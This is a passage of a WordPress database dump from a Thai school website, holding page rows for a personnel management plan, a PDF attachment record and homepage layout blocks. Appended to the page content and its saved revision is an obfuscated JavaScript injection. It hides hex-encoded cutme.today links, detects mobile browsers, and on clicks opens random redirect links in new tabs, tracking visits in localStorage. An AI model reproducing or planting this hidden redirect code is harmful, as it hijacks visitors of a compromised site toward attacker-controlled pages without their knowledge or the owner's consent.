)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n<!-- /wp:paragraph -->','แผนการบริหารและพัฒนาทรัพยากรบุคคล','','publish','closed','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%97%e0%b8%a3','','','2025-07-07 15:06:07','2025-07-07 08:06:07','',0,'http://pakhaeng.ssk.in.th/?page_id=566',0,'page','',0),
(567,1,'2024-08-06 21:13:23','2024-08-06 14:13:23','','แผนการบริหารและพัฒนาทรัพยากรบุคคล','','inherit','','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%97%e0%b8%a3','','','2024-08-06 21:13:23','2024-08-06 14:13:23','',566,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการบริหารและพัฒนาทรัพยากรบุคคล.pdf',0,'attachment','application/pdf',0),
(568,1,'2024-08-06 21:14:34','2024-08-06 14:14:34','<!-- wp:file {\"id\":567,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการบริหารและพัฒนาทรัพยากรบุคคล.pdf\",\"displayPreview\":true,\"previewHeight\":800} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการบริหารและพัฒนาทรัพยากรบุคคล.pdf\" type=\"application/pdf\" style=\"width:100%;height:800px\" aria-label=\"แผนการบริหารและพัฒนาทรัพยากรบุคคล\"></object><a id=\"wp-block-file--media-ce784887-2804-4f46-8c66-604f601c0365\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการบริหารและพัฒนาทรัพยากรบุคคล.pdf\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการบริหารและพัฒนาทรัพยากรบุคคล.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-ce784887-2804-4f46-8c66-604f601c0365\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แผนการบริหารและพัฒนาทรัพยากรบุคคล','','inherit','closed','closed','','566-revision-v1','','','2024-08-06 21:14:34','2024-08-06 14:14:34','',566,'http://pakhaeng.ssk.in.th/?p=568',0,'revision','',0),
(570,1,'2024-08-06 21:16:12','2024-08-06 14:16:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" 